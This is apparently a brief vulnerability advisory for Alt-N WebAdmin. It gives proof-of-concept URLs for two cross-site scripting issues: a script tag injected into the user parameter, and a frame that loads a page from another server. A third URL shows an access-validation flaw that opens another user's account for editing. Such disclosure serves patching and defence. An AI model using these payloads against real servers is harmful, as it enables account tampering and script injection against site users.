|
Alt-N WebAdmin Multiple Remote Vulnerabilities
No exploits are required. The following proof of concepts demonstrate the two cross-site scripting issues: http://www.example.com/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E http://www.example.com/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm The following proof of concept demonstrates the access validation issue: http://www.example.com/WebAdmin/useredit_account.wdm?user=otheruser@domain |
|
|
Privacy Statement |